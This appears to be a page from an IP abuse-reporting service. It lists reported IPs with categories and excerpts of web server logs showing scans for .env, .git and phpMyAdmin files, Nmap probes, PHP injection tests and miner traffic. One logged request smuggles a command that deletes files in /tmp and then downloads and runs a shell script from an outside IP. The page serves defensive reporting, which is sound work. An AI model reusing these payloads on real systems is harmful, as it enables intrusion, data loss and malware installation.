🇩🇪
85.203.15.77
06 Mar 2024
85.203.15.77 - - [05/Mar/2024:10:12:47 -0500] "GET /.env.save HTTP/1.1" 403 10077 "-" "Mozilla/5.0 ( ...
show more
85.203.15.77 - - [05/Mar/2024:10:12:47 -0500] "GET /.env.save HTTP/1.1" 403 10077 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
11843 85.203.15.44 - - [05/Mar/2024:10:12:48 -0500] "POST /.env.save HTTP/1.1" 403 10077 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
show less
DDoS Attack
Web App Attack
🇩🇪
85.203.15.45
06 Mar 2024
85.203.15.45 - - [05/Mar/2024:10:12:46 -0500] "POST /.env HTTP/1.1" 403 10067 "-" "Mozilla/5.0 (Maci ...
show more
85.203.15.45 - - [05/Mar/2024:10:12:46 -0500] "POST /.env HTTP/1.1" 403 10067 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
11842 85.203.15.77 - - [05/Mar/2024:10:12:47 -0500] "GET /.env.save HTTP/1.1" 403 10077 "-" "Mozilla/5.0 (Windows NT 10.0; Wi
show less
DDoS Attack
Web App Attack
🇩🇪
85.203.15.30
06 Mar 2024
85.203.15.30 - - [05/Mar/2024:10:12:45 -0500] "GET /.DS_Store HTTP/1.1" 403 10077 "-" "Mozilla/5.0 ( ...
show more
85.203.15.30 - - [05/Mar/2024:10:12:45 -0500] "GET /.DS_Store HTTP/1.1" 403 10077 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
11840 85.203.15.54 - - [05/Mar/2024:10:12:45 -0500] "GET /.env HTTP/1.1" 403 10067 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
11841 85.203.15.45 - - [05/Mar/2024:10:12:4
show less
DNS Poisoning
DDoS Attack
Web App Attack
🇩🇪
85.203.15.58
06 Mar 2024
10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
11842 85.203.15.7 ...
show more
10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
11842 85.203.15.77 - - [05/Mar/2024:10:12:47 -0500] "GET /.env.save HTTP/1.1" 403 10077 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
11843 85.203.15.44 - - [05/Mar/2024:10:12:48 -0500] "POST /.env.save HTTP/1.1" 403 10077 "-" "Mozilla/5.0 (Windows NT 10.
show less
DDoS Attack
🇸🇾
82.137.209.203
06 Feb 2024
82.137.209.203 SY IP reached maximum auth failures for a one day block 2024-02-06 06:15:01 2024-02-0 ...
show more
82.137.209.203 SY IP reached maximum auth failures for a one day block 2024-02-06 06:15:01 2024-02-07 06:15:01 1409
show less
Brute-Force
🇳🇱
84.54.51.118
02 Nov 2023
Aggros Operations Ltd, c/o COCENTER, Koppoldstr. 1, 86551 Aichach, Germany not Netherland !!! 84.54. ...
show more
Aggros Operations Ltd, c/o COCENTER, Koppoldstr. 1, 86551 Aichach, Germany not Netherland !!! 84.54.51.118 - - [01/Nov/2023:23:41:45 -0400] "GET /.env HTTP/1.1" 403 10069 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Opera/82.0.4227.44"
46447 84.54.51.118 - - [01/Nov/2023:23:41:47 -0400] "GET /api/.env HTTP/1.1" 403 10077 "-" "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/
show less
DNS Compromise
Web Spam
Web App Attack
🇺🇸
18.118.111.61
28 Sep 2023
18.118.111.61 - - [28/Sep/2022:20:21:48 -0400] "GET /.git/config HTTP/1.1" 403 10131 "-
Brute-Force
🇩🇪
217.160.10.70
11 Sep 2023
Sandro Vogelsang <[email protected] > Ronny Müssing <[email protected] > To ...
show more
Sandro Vogelsang <[email protected] > Ronny Müssing <[email protected] > Tobias Nick <[email protected] >From Sandro Vogelsang and Ronny Müssing and Tobias Nick
gerne nehme ich wieder Kontakt zu Ihnen auf und stelle unseren äußerst interessanten Kandidaten vor.
Mein Kandidat hat eine Ausbildung absolviert. Seitdem hat er zwei Jahre Berufserfahrung als Software Tester gesammelt. Im Anschluss daran hat er inzwischen 6,5 Jahre Berufserfahrung in der Web-Entwicklung gesammelt und möchte seine Kenntnisse dort weiter ausbreiten.
Mein Kandidat ist nun aktiv auf der Suche nach einem neuen Arbeitgeber, da er bei seinem aktuellen Arbeitgeber auf der Stelle steht und nicht mehr vorankommt. Er möchte nicht aufhören zu lernen und sich weiterentwickeln, dafür gibt es in seinem Unternehmen keine Perspektive mehr.
Folgende Schlüsselqualifikation bringt unser Kandidat mit:
show less
Email Spam
Web App Attack
🇩🇪
5.254.17.125
11 Sep 2023
5.254.17.125 - - [11/Sep/2022:01:30:01 -0400] "CONNECT 5.254.17.35:4444 HTTP/1.1" 403 10093 "-" "-"
Web App Attack
🇳🇱
185.162.235.116
04 Sep 2023
185.162.235.116 - - [03/Sep/2022:18:23:15 -0400] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\" ...
show more
185.162.235.116 - - [03/Sep/2022:18:23:15 -0400] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"42iTv5vWyRGYgWzKdLTruf6Dxr6gU2ALc57z7p7g7BMSMfZSTGCyrTB6VSwNYL1QcdEFdHG1SaBBuRoYc8LX3m8r2XZbZn9\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n" 400 10100 "-" "-"
show less
SQL Injection
Web App Attack
🇫🇷
172.232.38.218
21 Aug 2023
172.232.38.218 - - [20/Aug/2023:15:32:19 -0400] "GET /wordpress/ HTTP/1.1" 404 10081 "-" "Mozilla/5. ...
show more
172.232.38.218 - - [20/Aug/2023:15:32:19 -0400] "GET /wordpress/ HTTP/1.1" 404 10081 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.232.38.218 - - [20/Aug/2023:15:32:19 -0400] "GET /wp/ HTTP/1.1" 404 10067 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.232.38.218 - - [20/Aug/2023:15:32:19 -0400] "GET /blog/ HTTP/1.1" 404 10071 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.232.38.218 - - [20/Aug/2023:15:32:19 -0400] "GET /old/ HTTP/1.1" 404 10069 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.232.38.218 - - [20/Aug/2023:15:32:20 -0400] "GET /new/ HTTP/1.1" 404 10069 "-" "Mo
show less
Web App Attack
🇺🇸
142.93.121.198
21 Aug 2023
142.93.121.198 - - [21/Aug/2022:10:17:23 -0400] "GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 1 ...
show more
142.93.121.198 - - [21/Aug/2022:10:17:23 -0400] "GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
15353 142.93.121.198 - - [21/Aug/2022:10:17:23 -0400] "GET /phpmyadmin2022/index.php?lang=en HTTP/1.1" 404 10122 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
15354 142.93.121.198 - - [21/Aug/2022:10:17:23 -0400] "GET /mysqladmin/index.php?lang=en HTTP/1.1" 404 10114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
15355 142.93.121.198 - - [21/Aug/2022:10:17:23 -0400] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 10110 "-" "Mozilla/5.0
show less
DDoS Attack
Web App Attack
🇩🇪
80.82.215.213
20 Jun 2023
80.82.215.213 - - [19/Jun/2022:22:53:22 -0400] "GET /j.php/ HTTP/1.1" 404 10070 "www.google.com" "Mo ...
show more
80.82.215.213 - - [19/Jun/2022:22:53:22 -0400] "GET /j.php/ HTTP/1.1" 404 10070 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
7940 80.82.215.213 - - [19/Jun/2022:22:55:34 -0400] "GET /k.php/ HTTP/1.1" 404 10070 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
7941 80.82.215.213 - - [19/Jun/2022:22:57:47 -0400] "GET /xx.php/
show less
DDoS Attack
Web Spam
Brute-Force
🇭🇰
118.193.35.84
13 Jun 2023
118.193.35.84 - - [13/Jun/2022:22:49:10 -0400] "-" 408 - "-" "-"
6792 118.193.35.84 - - [13/Jun/ ...
show more
118.193.35.84 - - [13/Jun/2022:22:49:10 -0400] "-" 408 - "-" "-"
6792 118.193.35.84 - - [13/Jun/2022:22:49:11 -0400] "-" 408 - "-" "-"
6793 118.193.35.84 - - [13/Jun/2022:22:49:23 -0400] "-" 408 - "-" "-"
6794 118.193.35.84 - - [13/Jun/2022:22:49:43 -0400] "-" 408 - "-" "-"
6795 118.193.35.84 - - [13/Jun/2022:22:49:45 -0400] "-" 408 - "-" "-"
6796 118.193.35.84 - - [13/Jun/2022:22:49:45 -0400] "-" 408 - "-" "-"
6797 118.193.35.84 - - [13/Jun/2022:22:49:53 -0400] "-" 408 - "-" "-"
show less
DDoS Attack
🇭🇰
128.1.133.39
11 May 2023
128.1.133.39 - - [11/May/2022:10:48:06 -0400] "-" 408 - "-" "-"
553 128.1.133.39 - - [11/May/20 ...
show more
128.1.133.39 - - [11/May/2022:10:48:06 -0400] "-" 408 - "-" "-"
553 128.1.133.39 - - [11/May/2022:10:48:07 -0400] "-" 408 - "-" "-"
554 128.1.133.39 - - [11/May/2022:10:48:08 -0400] "-" 408 - "-" "-"
555 128.1.133.39 - - [11/May/2022:10:48:10 -0400] "-" 408 - "-" "-"
556 128.1.133.39 - - [11/May/2022:10:48:11 -0400] "-" 408 - "-" "-"
557 128.1.133.39 - - [11/May/2022:10:48:13 -0400] "-" 408 - "-" "-"
show less
DDoS Attack
🇺🇸
52.38.14.132
10 May 2023
52.38.14.132 - - [10/May/2023:08:18:12 -0400] "GET /img-sys/server_misconfigured.png HTTP/1.1" 200 3 ...
show more
52.38.14.132 - - [10/May/2023:08:18:12 -0400] "GET /img-sys/server_misconfigured.png HTTP/1.1" 200 3164 /cgi-sys/defaultwebpag
show less
Web App Attack
🇺🇸
209.141.45.140
08 May 2023
209.141.45.140 - - [06/May/2023:00:07:44 -0400] "GET /?'<?=print(9347655345-4954366)?>' HTTP/1.1" 40 ...
show more
209.141.45.140 - - [06/May/2023:00:07:44 -0400] "GET /?'<?=print(9347655345-4954366)?>' HTTP/1.1" 403 10141 "https://www.google.com/'<?=print(9347655345-4954366);?>'" "Mozilliqa'<?=print(9347655345-4954366);?>'"
209.141.45.140 - - [06/May/2023:00:07:45 -0400] "GET /?'{${print(9347655345-4954366)}}' HTTP/1.1" 200 163 "https://www.google.com/'{${print(9347655345-4954366)}}'" "Mozilliqa'{${print(9347655345-4954366)}}'"
209.141.45.140 - - [06/May/2023:00:07:46 -0400] "GET /?\"{${print(9347655345-4954366)}}\" HTTP/1.1" 200 163 "https://www.google.com/\"{${print(9347655345-4954366)}}\"" "Mozilliqa\
show less
SQL Injection
Web App Attack
🇺🇸
104.248.8.26
08 May 2023
104.248.8.26 - - [08/May/2023:04:17:13 -0400] "GET /nmaplowercheck1683533833 HTTP/1.1" 403 10106 "-" ...
show more
104.248.8.26 - - [08/May/2023:04:17:13 -0400] "GET /nmaplowercheck1683533833 HTTP/1.1" 403 10106 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) "
50338 104.248.8.26 - - [08/May/2023:04:17:13 -0400] "GET /evox/about HTTP/1.1" 403 10078 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
50339 104.248.8.26 - - [08/May/2023:04:17:13 -0400] "GET /HNAP1 HTTP/1.1" 403 10068 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
show less
Web App Attack
🇬🇧
85.203.34.115
10 Apr 2023
85.203.34.115 - - [09/Apr/2023:15:27:09 -0400] "HEAD /bak/well-known (1).zip" 400 - "-" "-"
DNS Compromise
🇬🇧
85.203.34.107
10 Apr 2023
85.203.34.107 - - [09/Apr/2023:15:06:23 -0400] "HEAD /backups/.well-known (1).zip" 400 - "-" "-"
DNS Compromise
🇱🇻
196.196.52.6
10 Apr 2023
196.196.52.6 - - [09/Apr/2023:12:56:26 -0400] "HEAD /well-known (2).zip" 400 - "-" "-"
DNS Compromise
Brute-Force
🇺🇸
137.184.144.76
25 Jan 2023
137.184.144.76 - - [25/Jan/2023:00:52:23 -0500] "GET /nmaplowercheck1674625943 HTTP/1.1" 403 10109 " ...
show more
137.184.144.76 - - [25/Jan/2023:00:52:23 -0500] "GET /nmaplowercheck1674625943 HTTP/1.1" 403 10109 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
38240 137.184.144.76 - - [25/Jan/2023:00:52:23 -0500] "GET /evox/about HTTP/1.1" 403 10081 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
38241 137.184.144.76 - - [25/Jan/2023:00:52:23 -0500] "GET /HNAP1 HTTP/1.1" 403 10071 "-" "Mozilla/5.0 (compat
show less
Web App Attack
🇸🇬
167.172.67.62
19 Jan 2023
167.172.67.62 - - [18/Jan/2023:18:42:22 -0500] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 101 ...
show more
167.172.67.62 - - [18/Jan/2023:18:42:22 -0500] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 10119 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
36832 167.172.67.62 - - [18/Jan/2023:18:42:23 -0500] "GET /phpmyadmin2022/index.php?lang=en HTTP/1.1" 404 10125 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
36833 167.172.67.62 - - [18/Jan/2023:18:42:23 -0500] "GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1" 404 10129 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
show less
Web App Attack
🇨🇳
113.85.11.52
16 Jan 2023
113.85.11.52 - - [16/Jan/2023:00:43:15 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+5.255.105.71/76d32be ...
show more
113.85.11.52 - - [16/Jan/2023:00:43:15 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+5.255.105.71/76d32be0.sh;sh+/tmp/76d32be0.sh HTTP/1.1" 403 10193 "-" "Hello, world"
show less
Web App Attack
🇺🇸
35.185.24.107
21 Dec 2022
35.185.24.107 - - [20/Dec/2022:12:38:47 -0500] "{\"id\": 1, \"method\": \"mining.subscribe\", \"para ...
show more
35.185.24.107 - - [20/Dec/2022:12:38:47 -0500] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": []}\n" 400 1008
show less
Fraud Orders
Phishing